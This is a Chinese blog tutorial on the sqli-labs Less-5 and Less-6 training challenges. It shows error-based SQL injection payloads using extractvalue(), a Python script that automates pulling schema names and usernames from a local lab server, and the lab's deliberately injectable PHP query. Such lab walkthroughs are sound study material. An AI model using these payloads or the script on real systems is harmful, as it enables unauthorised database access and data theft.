less-5

最新推荐文章于 2024-03-03 22:48:33 发布
最新推荐文章于 2024-03-03 22:48:33 发布
阅读量488 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shawdow_bug/article/details/107525346
版权

(1)打开页面后,根据提示输入 ?id=1

可以看到没有回显点了

(2)输入:/?id=1 and 1=1

页面仍然正常显示,less-1解释过" and 1=1"有可能是作为’1 and 1=1’字符串的一部分,而没有被当作语句的一部分来执行。

(3)输入: /?id=1 and 1=2

页面没有变化,说明" and 1=2"确实是作为字符串的一部分,更精确地说它没有起到作用。

(4)输入:/?id=1’

有报错信息,分析它返回的一部分SQL语句:‘1’’ LIMIT 0,1,前面的单引号要闭合,后一个单引号要注释掉。

(5)输入:/?id=1’ and 1=1 --%20

这回" and 1=1"已经被当作SQL语句的一部分来执行了,接下来可以获取数据了。

没有回显点的情况下,可以根据页面是否异常来进行布尔盲注。

但是有报错信息回显,所以报错注入更为方面,即可以用extractvalue()或updatexml()这两个处理XML文档数据的函数,或者用rand()、floor()和count()三个函数一起进行报错注入。

(6)输入:/?id=1’ and extractvalue(1, concat(0x7c, mid((select database()),1))) --%20

这里把concat()套在mid()外面的原因,主要是为了更好地显示并整理数据,因为extractvalue()的第 2 个参数不符合XPATH格式的时候就会报错,当检索出的字符串包含","、" | "等一些特殊字符时,extractvalue()就会执行出错,并且在报错信息中显示这些特殊字符之后的数据部分。

如果把concat()套在mid()里面,当修改mid()的第2个参数值时,前后两次获取到的数据有重叠部分。如:

输入 /?id=1’ and extractvalue(1, mid(concat(0x7c, (select group_concat(schema_name) from information_schema.schemata)),10)) --%20

输入 /?id=1’ and extractvalue(1, mid(concat(0x7c, (select group_concat(schema_name) from information_schema.schemata)),20)) --%20

可以看到,当改变mid()截取字符串的起始位置时,前后两次(10和20)并没有发生什么变化,是因为" |informaiton_schema, "长度为20,从 10 或 20开始截取,碰到的第一个逗号“ , ”都是“ , bwapp…”的“b”前面那个“ , ”,所以两次报错显示的数据都是从这里开始。

因此,在mid()截取到字符串后,在外面用concat()拼接一个" | “,得到字符串必然为 " |…”,报错显示的数据也必然是从 " | "开始。

(7)一个python小脚本:

import requests
import re

url = "http://192.168.127.130/sqli-labs-master/Less-5/?id=1' and extractvalue(1, concat(0x7c,mid(" \
      "(select group_concat(schema_name) from information_schema.schemata " \     # 在这里修改SQL语句,获取想要的数据
      "),%s,10))) --%%20"

db_list = []
str = ''
i = 1

while True:
    # 0、构造URL
    url2 = url % i
    # 1、发送get请求,获得响应页面
    r = requests.get(url2)
    # 2、从页面中提取数据
    s = re.findall(r"XPATH syntax error: '.*?'", r.text)[0][22:-1]
    # 3、如果没有提取到数据,结束循环,否则保存数据到变量中,回到步骤 0
    if s:
        str += s
        i += 10
    else:
        break

# 4、将数据分割成一个个字符串,保存到列表中
print(str)
db_list = str[1:].split(',')
print(db_list)

运行结果:

修改SQL语句为:select group_concat(table_name) from information_schema.tables where table_schema=database()
运行结果:

修改SQL语句为:select group_concat(column_name) from information_schema.columns where table_name=‘users’
运行结果:

修改SQL语句为:select group_concat(username) from users
运行结果:

源代码

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
 	echo '<font size="5" color="#FFFF00">';	
 	echo 'You are in...........';                  # 这里与前4关相比,没有了回显点
 	echo "<br>";
   	echo "</font>";
} else 
{
	echo '<font size="3" color="#FFFF00">';
	print_r(mysql_error());
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
}
else { echo "Please input the ID as parameter with numeric value";}

less-6

less-6的思路是一样,只不过是构造的SQL语句不同。

less-6的语句:

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
friEnd`
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs Less-5 (报错注入)
A9874564的博客
02-25 4212
在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要报错注入。 1.less 5 正常情况,我们构造闭合,发现没有问题 利用前几关的思路,发现无论怎么操作都是You are in......,这个时候一般的思路就行不通。 发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试报错注入。 2.报错注入 2.1 extractvalue报错 示例: and extractvalue(null,concat(0x7e,(sql_inje.
less-plugin-clean-css:使用clean-css对CSS进行后期处理和压缩
02-23
npm install -g less-plugin-clean-css 然后在命令行上 lessc file.less --clean-css="--s1 --advanced --compatibility=ie8" 见的可用命令选项-唯一的区别是advanced和rebase ,我们默认为false,因为它并不总是...
Less 5-6(双注入)
老司机开代码的博客
08-03 1751
文章目录1. Less-51.1 问题描述1.2 解法一:双注入破解1.2.1 双注入的过程1.2.2 双注入的原理(floor报错的原因)1. rand()生产随机数的原理2. floor(rand())如何分组1.3 解法二:布尔盲注2. Less-63. 小结 1. Less-5 1.1 问题描述 首先我们看一下题目 意思是考察SQL注入的双注入。 这里涉及到了一个关键的知识点,利用cou...
Sqli-labs之Less-5和Less-6
m0_46315342的博客
06-04 910
      这两关正确的思路是盲注。从源代码中可以看到,运行返回结果正确的时候只返回 you are in....,不会返回数据库当中的信息了(但会print_f(mysql_error()),这点很重要),所以我们不能利用前面 less1-4 的方法。 我们对比...
sql-libs——less5(盲注)
bronze_s的博客
10-16 495
首先打开页面,输入? id=1,发现没有任何数据爆出这时把ID换成一个不存在数据-1试一下,发现连 you are in …都没有了,这就是典型的盲注,正确时显示you are in …,不正确时什么也不显示。 http://192.168.0.5:9002/Less-5/?id=-1 加'试一下,发现报错,说明存在SQL注入漏洞。 http://192.168.0.5:9002/Less-5/?id=-1' 首先我们使用length()函数获取数据库名字的长度 这里呢等于7没有返回任何信息,证明数
MySQL Sqli-labs less5 盲注
qq_45764109的博客
10-22 47
原理:函数的作用来自xiaodi 第16天文件: 布尔注入 只能循环跑 看版本号的第一位是不是5 不知道为什么有时候用# 有时候用– 布尔注入正确就没有什么显示的先看一下数据库的长度,才能进行判断 4. 猜测数据库的字符 5. 获取security数据库的字符 第一个表的第一个字符 email 101=e 第一个表的第二个字符 m 获取第二个表第一个字符 第二个表示referers表,所以第一位就是r.(mysql注入天书写错了) 6.利用regexp
less-plugin-autoprefix:添加了由 autoprefixer 对 less 进行后处理的能力
05-29
npm install -g less-plugin-autoprefix 然后在命令行上, lessc file.less --autoprefix="browsers" 浏览器是由逗号分隔的列表。 程序化用法 var LessPluginAutoPrefix = require ( 'less-plugin-autoprefix' )...
mrcrowl.easy-less-1.7.2.zip
03-25
《深入解析mrcrowl.easy-less-1.7.2.zip:轻松驾驭LESS语言的VSCode插件》 在Web开发领域,LESS是一种强大的CSS预处理器,它扩展了CSS的功能,引入了变量、嵌套规则、混合(mixins)以及函数等特性,使得CSS代码...
Webpack中css-loader和less-loader的使用教程
12-03
本文将详细介绍如何在Webpack配置中使用`css-loader`和`less-loader`。 ### 一、css-loader `css-loader`的主要功能是解析CSS文件,使其能够在JavaScript中被导入。通过`require`或`import`语句,你可以将CSS文件...
前端开源库-less-modify-var-loader
08-30
"less-modify-var-loader"就是一个专为前端开发者设计的开源库,它主要用于处理Less预处理器中的变量,特别是在使用Webpack构建项目时,能够方便地替换Less文件中的变量值。 Less是一种CSS预处理器,它允许我们使用...
sql 注入 之sqli-labs/less-5 双注入,也称:报错注入
最新发布
没有故事
03-03 993
模板:select * from user where id=1 and (updatexml("任意字符", concat(0x7e,模板:select * from user where id =1 and (extractvalue(1,concat(0x7e,,0x7e),"任意字符"));该关卡返回正确或者错误页面,还有错误的代码,所以可以使用报错注入。limit 0,1 limit 1,1 limit 5,1 分别查出字段名。0x3c,0x68,0x72,0x2f,0x3e : 换行符。
sqli-libs——less 5(盲注)
Fly_鹏程万里
05-08 1873
Less-5由于这一关涉及到盲注的内容,所以我们还是想来看看源代码吧:可以看到,如果运行返回结果正确的时候只返回you  are in...,不会返回数据库当中的信息了,所以我们不能之前所采用的在less-4之前的方法了。从这里开始就要进行盲注了!利用left(a,b)进行测试测试数据库版本利用left(database(),1)进行尝试http://192.168.11.136/sqli-lab...
Less-5
weixin_30483697的博客
04-05 104
第5关,这关设计到的东西是盲注,不知道小伙伴们有没有听过,我们先来看一下这也页面。 没有打印出账号密码,只打印了是否存在。盲注的意思是用一个逻辑来判断是否存在某个库或表或字段。盲注又分了3种:1、基于时间的盲注。 2、基于布尔的盲注。 3、基于报错的盲注。我来列举两种。 时间注入: select * from users where id =1 and 1=(if(substr(data...
LESS-5,LESS-6
qq_44598397的博客
03-16 772
LESS-5: 源码: 1、输入http://127.0.0.1/sqlilabs/Less-5/?id=1时没有出现错误: 2、输入http://127.0.0.1/sqlilabs/Less-5/?id=268,没有出现显示位,不能使用union语句 3、输入127.0.0.1/sqlilabs/Less-5/?id=1’ 进行错误分析,出现错误’’1’’LIMIT 0,1’除去收尾和自...
【sql注入】Less5-7详解
lyy0xfff的博客
07-13 880
SQL注入Less-5Less-6Less-7 Less-5 0x00 首先根据题意我们输入参数id=1,和id=-1看看页面的回显情况 我们发现当它执行的SQL语句正确时,页面返回You are in,当sql语句执行不正确时,返回为空,且并没有回显位置,这就是我们所说的盲注,具体什么时盲注可以看我之前的文章基于布尔类型、时间类型的盲注 0x01 Less-6 Less-7 ...
sqli-labs:less-5(单引号报错注入)
羽的博客
07-13 238
?id=1 ?id=2 ?id=3 这时只回显这个界面 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...
Sqli-labs--less-5
沐目的博客
04-08 4454
sqli-labs-master/Less-5/ 字符型,报错注入 首先 ?id=1’ 报错。让后用双引号,回显正常。再使用单引号+%23,回显正常,基本可以确定是单引号字符型。但是发现使用平常的 union select ,没有任何反应。 所以这道题需要一个新的知识点,刚学sql注入的同学,可能会有一点崩溃。有两种方法,叫做报错注入,其实有三种,但是我只会两种。 一、 报错注入了解一下:(报错...
安装less-loader 和less
09-08
例如,如果你使用的是webpack@4,那么可以选择less-loader@5~7版本。 2. 打开命令行终端,运行以下命令来安装less-loader: ``` npm install less-loader@7 --save-dev ``` 3. 确保你已经安装了webpack和webpack...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值